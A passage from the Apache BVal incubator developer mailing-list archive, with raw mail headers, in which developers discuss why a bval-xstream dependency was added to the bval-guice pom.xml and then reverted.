=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > --- incubator/bval/trunk/bval-guice/pom.xml (original) > +++ incubator/bval/trunk/bval-guice/pom.xml Fri Jul =C2=A09 18:31:49 2010 > @@ -39,7 +39,15 @@ > =C2=A0 =C2=A0 <dependencies> > =C2=A0 =C2=A0 =C2=A0 =C2=A0 <dependency> > =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 <groupId>org.apache.bval</group= Id> > - =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<artifactId>org.apache.bval.bu= ndle</artifactId> > + =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<artifactId>bval-core</artifac= tId> > + =C2=A0 =C2=A0 =C2=A0 =C2=A0</dependency> > + =C2=A0 =C2=A0 =C2=A0 =C2=A0<dependency> > + =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<groupId>org.apache.bval</grou= pId> > + =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<artifactId>bval-jsr303</artif= actId> > + =C2=A0 =C2=A0 =C2=A0 =C2=A0</dependency> > + =C2=A0 =C2=A0 =C2=A0 =C2=A0<dependency> > + =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<groupId>org.apache.bval</grou= pId> > + =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<artifactId>bval-xstream</arti= factId> > =C2=A0 =C2=A0 =C2=A0 =C2=A0 </dependency> > =C2=A0 =C2=A0 =C2=A0 =C2=A0 <dependency> > =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 <groupId>com.google.inject</gro= upId> > > > From [email protected] Thu Jul 15 15:50:47 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10608 invoked from network); 15 Jul 2010 15:50:47 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 15 Jul 2010 15:50:47 -0000 Received: (qmail 4822 invoked by uid 500); 15 Jul 2010 15:50:47 -0000 Delivered-To: [email protected] Received: (qmail 4800 invoked by uid 500); 15 Jul 2010 15:50:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 4792 invoked by uid 99); 15 Jul 2010 15:50:46 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Jul 2010 15:50:46 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp102.prem.mail.ac4.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 15 Jul 2010 15:50:38 +0000 Received: (qmail 36264 invoked from network); 15 Jul 2010 15:49:17 -0000 Received: from drwoods.local ([email protected] with plain) by smtp102.prem.mail.ac4.yahoo.com with SMTP; 15 Jul 2010 08:49:17 -0700 PDT X-Yahoo-SMTP: sCI.ryiswBB7FW.DxjU523c87MI- X-YMail-OSG: 0j19UmMVM1nWTLpuW8AzvnAop88s_EOwP36abfxbzwImkxw qVTgEa2y1s.72.GpIJhl5HacbHvxTOtNYysDk1fhZeDi8F2Tjc3m823JnKVy 6_TAZLttFi9dTWQ0d4sm_kdkY7AmMjhpUrCMGkqCVYZt079Y_XDc2aApdbM1 mhSWh9cZ0Jr7H27sSl99lfA6iB0XdM9TYcpHMkeOquiztGUJ9bXRIZuOLe3M iCXYcjI7gMJIQ5UddXuSgpwqthUHVYoaBJwZV4qWBEISKIzgm9htNGbfKLDm MX1Snomeq3z1M9u2ZBV9C4BExcJK9aYG2cYWdcXeUsO09wDOTrlY3EGN5Qzw eFfnhL28Gr50QwiKNTw-- X-Yahoo-Newman-Property: ymail-3 Message-ID: <[email protected]> Date: Thu, 15 Jul 2010 11:49:17 -0400 From: Donald Woods <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20100608 Lightning/1.0b2 Thunderbird/3.1 MIME-Version: 1.0 To: [email protected] Subject: Re: svn commit: r962625 - /incubator/bval/trunk/bval-guice/pom.xml References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org It is optional and the changes made in r962625 were undone using r962634 which also fixed the dependency. -Donald On 7/15/10 4:44 AM, Simone Tripodi wrote: > Hi Donald, > I'm sure at 100% I missed something in the discussion list, but the > guice module doesn't use the xstream module features at all, can you > at least point me the discussion why this module is required? Thanks > in advance! :) > Simo > > http://people.apache.org/~simonetripodi/ > http://www.99soft.org/ > > > > On Fri, Jul 9, 2010 at 8:31 PM, <[email protected]> wrote: >> Author: dwoods >> Date: Fri Jul 9 18:31:49 2010 >> New Revision: 962625 >> >> URL: http://svn.apache.org/viewvc?rev=962625&view=rev >> Log: >> BVAL-77 Add bval-xstream depend for bval-guice >> >> Modified: >> incubator/bval/trunk/bval-guice/pom.xml >> >> Modified: incubator/bval/trunk/bval-guice/pom.xml >> URL: http://svn.apache.org/viewvc/incubator/bval/trunk/bval-guice/pom.xml?rev=962625&r1=962624&r2=962625&view=diff >> ============================================================================== >> --- incubator/bval/trunk/bval-guice/pom.xml (original) >> +++ incubator/bval/trunk/bval-guice/pom.xml Fri Jul 9 18:31:49 2010 >> @@ -39,7 +39,15 @@ >> <dependencies> >> <dependency> >> <groupId>org.apache.bval</groupId> >> - <artifactId>org.apache.bval.bundle</artifactId> >> + <artifactId>bval-core</artifactId> >> + </dependency> >> + <dependency> >> + <groupId>org.apache.bval</groupId> >> + <artifactId>bval-jsr303</artifactId> >> + </dependency> >> + <dependency> >> + <groupId>org.apache.bval</groupId> >> + <artifactId>bval-xstream</artifactId> >> </dependency> >> <dependency> >> <groupId>com.google.inject</groupId> >> >> >> > From [email protected] Thu Jul 15 19:32:59 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12686 invoked from network); 15 Jul 2010 19:32:59 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 15 Jul 2010 19:32:59 -0000 Received: (qmail 29558 invoked by uid 500); 15 Jul 2010 19:32:59 -0000 Delivered-To: [email protected] Received: (qmail 29533 invoked by uid 500); 15 Jul 2010 19:32:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29525 invoked by uid 99); 15 Jul 2010 19:32:58 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Jul 2010 19:32:58 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Jul 2010 19:32:52 +0000 Received: by ewy7 with SMTP id 7so395266ewy.6 for <[email protected]>; Thu, 15 Jul 2010 12:31:43 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=foGpK1RcoIa8r1zQhBtSlaaJtV2SaNeGL9wFfD7GMP0=; b=ofQq51pg7R+/QWiIlxaVMBtglDu9FZw5GUGGNqJYOJdNAnFhabBXWZ/mcp7BNQnHh2 2vZsdi+B0V0C1tjJZhI05jkCOY0GtiW3Rv6TeLxlLHCKmfIwAofJ3yuoK64n8uqLuAsC DLJedCN7ByT/hbCnBgQP+D1uC7mZZ5WrBkIb4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=GAZEH9hwugwzh42we6aT5VCidA7/A6QwpsYUrrgLn8+BswBf9D60krl7UB1nEs3Coz Avty9EuaL3PWpYFLsEPlkl3+uR84TFPstvYB433QHwokabP5Jtl7skeRrXuzcR86HaJT xVg7Cw9Gevj3/EbhXjWmdjcAF7b3k7HBgu4Cw= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id b10mr3220045ebd.98.1279222302833; Thu, 15 Jul 2010 12:31:42 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 15 Jul 2010 12:31:42 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Thu, 15 Jul 2010 21:31:42 +0200 Message-ID: <[email protected]> Subject: Re: svn commit: r962625 - /incubator/bval/trunk/bval-guice/pom.xml From: Simone Tripodi <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Yes I noticed that's optional, thanks for reminding it, but I didn't understand which caused the dependency had to be added. Just curious, can you or someone else explain to me why? Thanks in advance, have a nice day, Simo http://people.apache.org/~simonetripodi/ http://www.99soft.org/ On Thu, Jul 15, 2010 at 5:49 PM, Donald Woods <[email protected]> wrote: > It is optional and the changes made in r962625 were undone using r962634 > which also fixed the dependency. > > -Donald > > > On 7/15/10 4:44 AM, Simone Tripodi wrote: >> Hi Donald, >> I'm sure at 100% I missed something in the discussion list, but the >> guice module doesn't use the xstream module features at all, can you >> at least point me the discussion why this module is required? Thanks >> in advance! :) >> Simo >> >> http://people.apache.org/~simonetripodi/ >> http://www.99soft.org/ >> >> >> >> On Fri, Jul 9, 2010 at 8:31 PM, =C2=A0<[email protected]> wrote: >>> Author: dwoods >>> Date: Fri Jul =C2=A09 18:31:49 2010 >>> New Revision: 962625 >>> >>> URL: http://svn.apache.org/viewvc?rev=3D962625&view=3Drev >>> Log: >>> BVAL-77 Add bval-xstream depend for bval-guice >>> >>> Modified: >>> =C2=A0 =C2=A0incubator/bval/trunk/bval-guice/pom.xml >>> >>> Modified: incubator/bval/trunk/bval-guice/pom.xml >>> URL: http://svn.apache.org/viewvc/incubator/bval/trunk/bval-guice/pom.x= ml?rev=3D962625&r1=3D962624&r2=3D962625&view=3Ddiff >>> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D >>> --- incubator/bval/trunk/bval-guice/pom.xml (original) >>> +++ incubator/bval/trunk/bval-guice/pom.xml Fri Jul =C2=A09 18:31:49 20= 10 >>> @@ -39,7 +39,15 @@ >>> =C2=A0 =C2=A0 <dependencies> >>> =C2=A0 =C2=A0 =C2=A0 =C2=A0 <dependency> >>> =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 <groupId>org.apache.bval</gro= upId> >>> - =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<artifactId>org.apache.bval.= bundle</artifactId> >>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<artifactId>bval-core</artif= actId> >>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0</dependency> >>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0<dependency> >>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<groupId>org.apache.bval</gr= oupId> >>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<artifactId>bval-jsr303</art= ifactId> >>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0</dependency> >>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0<dependency> >>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<groupId>org.apache.bval</gr= oupId> >>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<artifactId>bval-xstream</ar= tifactId> >>> =C2=A0 =C2=A0 =C2=A0 =C2=A0 </dependency> >>> =C2=A0 =C2=A0 =C2=A0 =C2=A0 <dependency> >>> =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 <groupId>com.google.inject</g= roupId> >>> >>> >>> >> > From [email protected] Thu Jul 15 20:00:12 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21930 invoked from network); 15 Jul 2010 20:00:07 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 15 Jul 2010 20:00:07 -0000 Received: (qmail 51012 invoked by uid 500); 15 Jul 2010 20:00:07 -0000 Delivered-To: [email protected] Received: (qmail 50987 invoked by uid 500); 15 Jul 2010 20:00:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50979 invoked by uid 99); 15 Jul 2010 20:00:06 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Jul 2010 20:00:06 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-gx0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Jul 2010 19:59:58 +0000 Received: by gxk3 with SMTP id 3so511725gxk.6 for <[email protected]>; Thu, 15 Jul 2010 12:58:48 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:content-type:mime-version :subject:from:in-reply-to:date:content-transfer-encoding:message-id :references:to:x-mailer; bh=HVxAwSYAQY1ryjqPIOFfbqRNon6vdfXWOMh5P74bZLY=; b=C+/vc6EekX+jUFNAbuGbjNKsniBbPkBAfIvBySpKT9MLR2YDi2hObPlB2hdgITSx5G H3exoWbfFCVyUxoiAh/uJ3xVE/Ix0eHx5CMwSnhlphRHzqGOVi4jR38dL8D/64s32Rs6 OZGTWIGp3Ba9FtoG2EVjd13ikgrKt3LSE6q3M= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=content-type:mime-version:subject:from:in-reply-to:date :content-transfer-encoding:message-id:references:to:x-mailer; b=f74i9P7bkisoqRrq6qsK267AD4oZVVLgC3LvmlhnKgV6JfWdk/VtME6Z+Qhmh6V+Zl 6qkWbgXONSieFyqz5cenjMCz7gl865bry41VIMGOx/MzzdkL+oQBe/gECuiBSfyb7n9Y w1GUuiG+6LuvirGSVTfeNyIAXYxgn0vduCxys= Received: by 161.129.204.104 with SMTP id f19mr212202ani.24.1279223928176; Thu, 15 Jul 2010 12:58:48 -0700 (PDT) Received: from [161.129.204.104] (adsl-068-213-090-227.sip.bhm.bellsouth.net [161.129.204.104]) by mx.google.com with ESMTPS id p12sm15099440ane.34.2161.129.204.104.58.46 (version=TLSv1/SSLv3 cipher=RC4-MD5); Thu, 15 Jul 2010 12:58:47 -0700 (PDT) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Apple Message framework v1081) Subject: Re: svn commit: r962625 - /incubator/bval/trunk/bval-guice/pom.xml From: Matt Benson <[email protected]> In-Reply-To: <[email protected]> Date: Thu, 15 Jul 2010 14:58:44 -0500 Content-Transfer-Encoding: quoted-printable Message-Id: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> To: [email protected] X-Mailer: Apple Mail (2.1081) X-Virus-Checked: Checked by ClamAV on apache.org On Jul 15, 2010, at 2:31 PM, Simone Tripodi wrote: > Yes I noticed that's optional, thanks for reminding it, but I didn't > understand which caused the dependency had to be added. Just curious, > can you or someone else explain to me why? > Thanks in advance, have a nice day, > Simo >=20 Simone, The reason for the dependency having been added was a lack of = understanding on my part why the method signature of = ApacheFactoryContext#createXMLMetaBeanManager was set as = MetaBeanManager. One of my larger submitted patches contained a change = that made the return type of this method explicitly XMLMetaBeanManager. = The volume of my patch was so large that the error went unnoticed until = the guice module stopped building. Sorry for the noise, Matt > http://people.apache.org/~simonetripodi/ > http://www.99soft.org/ >=20 >=20 >=20 > On Thu, Jul 15, 2010 at 5:49 PM, Donald Woods <[email protected]> = wrote: >> It is optional and the changes made in r962625 were undone using = r962634 >> which also fixed the dependency. >>=20 >> -Donald >>=20 >>=20 >> On 7/15/10 4:44 AM, Simone Tripodi wrote: >>> Hi Donald, >>> I'm sure at 100% I missed something in the discussion list, but the >>> guice module doesn't use the xstream module features at all, can you >>> at least point me the discussion why this module is required? Thanks >>> in advance! :) >>> Simo >>>=20 >>> http://people.apache.org/~simonetripodi/ >>> http://www.99soft.org/ >>>=20 >>>=20 >>>=20 >>> On Fri, Jul 9, 2010 at 8:31 PM, <[email protected]> wrote: >>>> Author: dwoods >>>> Date: Fri Jul 9 18:31:49 2010 >>>> New Revision: 962625 >>>>=20 >>>> URL: http://svn.apache.org/viewvc?rev=3D962625&view=3Drev >>>> Log: >>>> BVAL-77 Add bval-xstream depend for bval-guice >>>>=20 >>>> Modified: >>>> incubator/bval/trunk/bval-guice/pom.xml >>>>=20 >>>> Modified: incubator/bval/trunk/bval-guice/pom.xml >>>> URL: = http://svn.apache.org/viewvc/incubator/bval/trunk/bval-guice/pom.xml?rev=3D= 962625&r1=3D962624&r2=3D962625&view=3Ddiff >>>> = =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D >>>> --- incubator/bval/trunk/bval-guice/pom.xml (original) >>>> +++ incubator/bval/trunk/bval-guice/pom.xml Fri Jul 9 18:31:49 = 2010 >>>> @@ -39,7 +39,15 @@ >>>> <dependencies> >>>> <dependency> >>>> <groupId>org.apache.bval</groupId> >>>> - <artifactId>org.apache.bval.bundle</artifactId> >>>> + <artifactId>bval-core</artifactId> >>>> + </dependency> >>>> + <dependency> >>>> + <groupId>org.apache.bval</groupId> >>>> + <artifactId>bval-jsr303</artifactId> >>>> + </dependency> >>>> + <dependency> >>>> + <groupId>org.apache.bval</groupId> >>>> + <artifactId>bval-xstream</artifactId> >>>> </dependency> >>>> <dependency> >>>> <groupId>com.google.inject</groupId> >>>>=20 >>>>=20 >>>>=20 >>>=20 >>=20 From [email protected] Thu Jul 15 20:34:43 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37366 invoked from network); 15 Jul 2010 20:34:42 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 15 Jul 2010 20:34:42 -0000 Received: (qmail 92625 invoked by uid 500); 15 Jul 2010 20:34:42 -0000 Delivered-To: [email protected] Received: (qmail 92575 invoked by uid 500); 15 Jul 2010 20:34:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 92562 invoked by uid 99); 15 Jul 2010 20:34:42 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Jul 2010 20:34:42 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ey0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Jul 2010 20:34:35 +0000 Received: by eyf5 with SMTP id 5so312523eyf.6 for <[email protected]>; Thu, 15 Jul 2010 13:34:14 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=uOkgquXJcqlD2CbI0YRUflGJKOLdeCqJDEw8iFncBDQ=; b=bX/A2LXkPUSshrwop+lcL2Cu6myTtanZ6vlCDsQ6WGd3m/JsadULGky/srnQtB+ydh OBReR8+8ZGA5mMXirv7lJ1MZyeENQyceIUszvrd1hXDkJs6X36+2zmGPBqC/HdVAN33x gVfVJQf69FPXhEaR702FWkxd3T5D89j8plRwE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=m3SWuDF6d9F51ZS+5QoqxboDsATEluq2RDY0ZvyajiER0DITjhQlFDfXoV4bqxfvcM 9RabXJSDtB7Q7HKVTkFwv06mReDNoC6jfRH1ZqU7UUKIfSLO28ePZlyX6wbwFKgYtE7W LiS5j2TF29P0u/sfbnik44k0c2OBckRhvTAbE= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id y15mr229930ebc.38.1279226054637; Thu, 15 Jul 2010 13:34:14 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 15 Jul 2010 13:34:14 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 15 Jul 2010 22:34:14 +0200 Message-ID: <[email protected]> Subject: Re: svn commit: r962625 - /incubator/bval/trunk/bval-guice/pom.xml From: Simone Tripodi <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Hi Matt, thanks for your explanation, I really don't think you made noise and I really appreciate you reply :) Have a nice day, see you! Simo http://people.apache.org/~simonetripodi/ http://www.99soft.org/ On Thu, Jul 15, 2010 at 9:58 PM, Matt Benson <[email protected]> wrote: > > On Jul 15, 2010, at 2:31 PM, Simone Tripodi wrote: > >> Yes I noticed that's optional, thanks for reminding it, but I didn't >> understand which caused the dependency had to be added. Just curious, >> can you or someone else explain to me why? >> Thanks in advance, have a nice day, >> Simo >> > > Simone, > =C2=A0The reason for the dependency having been added was a lack of under= standing on my part why the method signature of ApacheFactoryContext#create= XMLMetaBeanManager was set as MetaBeanManager. =C2=A0One of my larger submi= tted patches contained a change that made the return type of this method ex= plicitly XMLMetaBeanManager. =C2=A0The volume of my patch was so large that= the error went unnoticed until the guice module stopped building. > > Sorry for the noise, > Matt > >> http://people.apache.org/~simonetripodi/ >> http://www.99soft.org/ >> >> >> >> On Thu, Jul 15, 2010 at 5:49 PM, Donald Woods <[email protected]> wrote: >>> It is optional and the changes made in r962625 were undone using r96263= 4 >>> which also fixed the dependency. >>> >>> -Donald >>> >>> >>> On 7/15/10 4:44 AM, Simone Tripodi wrote: >>>> Hi Donald, >>>> I'm sure at 100% I missed something in the discussion list, but the >>>> guice module doesn't use the xstream module features at all, can you >>>> at least point me the discussion why this module is required? Thanks >>>> in advance! :) >>>> Simo >>>> >>>> http://people.apache.org/~simonetripodi/ >>>> http://www.99soft.org/ >>>> >>>> >>>> >>>> On Fri, Jul 9, 2010 at 8:31 PM, =C2=A0<[email protected]> wrote: >>>>> Author: dwoods >>>>> Date: Fri Jul =C2=A09 18:31:49 2010 >>>>> New Revision: 962625 >>>>> >>>>> URL: http://svn.apache.org/viewvc?rev=3D962625&view=3Drev >>>>> Log: >>>>> BVAL-77 Add bval-xstream depend for bval-guice >>>>> >>>>> Modified: >>>>> =C2=A0 =C2=A0incubator/bval/trunk/bval-guice/pom.xml >>>>> >>>>> Modified: incubator/bval/trunk/bval-guice/pom.xml >>>>> URL: http://svn.apache.org/viewvc/incubator/bval/trunk/bval-guice/pom= .xml?rev=3D962625&r1=3D962624&r2=3D962625&view=3Ddiff >>>>> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D >>>>> --- incubator/bval/trunk/bval-guice/pom.xml (original) >>>>> +++ incubator/bval/trunk/bval-guice/pom.xml Fri Jul =C2=A09 18:31:49 = 2010 >>>>> @@ -39,7 +39,15 @@ >>>>> =C2=A0 =C2=A0 <dependencies> >>>>> =C2=A0 =C2=A0 =C2=A0 =C2=A0 <dependency> >>>>> =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 <groupId>org.apache.bval</g= roupId> >>>>> - =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<artifactId>org.apache.bva= l.bundle</artifactId> >>>>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<artifactId>bval-core</art= ifactId> >>>>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0</dependency> >>>>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0<dependency> >>>>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<groupId>org.apache.bval</= groupId> >>>>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<artifactId>bval-jsr303</a= rtifactId> >>>>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0</dependency> >>>>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0<dependency> >>>>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<groupId>org.apache.bval</= groupId> >>>>> + =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0<artifactId>bval-xstream</= artifactId> >>>>> =C2=A0 =C2=A0 =C2=A0 =C2=A0 </dependency> >>>>> =C2=A0 =C2=A0 =C2=A0 =C2=A0 <dependency> >>>>> =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 <groupId>com.google.inject<= /groupId> >>>>> >>>>> >>>>> >>>> >>> > > From [email protected] Fri Jul 16 09:38:59 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54303 invoked from network); 16 Jul 2010 09:38:59 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 16 Jul 2010 09:38:59 -0000 Received: (qmail 48364 invoked by uid 500); 16 Jul 2010 09:38:59 -0000 Delivered-To: [email protected] Received: (qmail 48324 invoked by uid 500); 16 Jul 2010 09:38:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48311 invoked by uid 99); 16 Jul 2010 09:38:57 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jul 2010 09:38:57 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-vw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jul 2010 09:38:49 +0000 Received: by vws3 with SMTP id 3so2363015vws.6 for <[email protected]>; Fri, 16 Jul 2010 02:38:28 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; 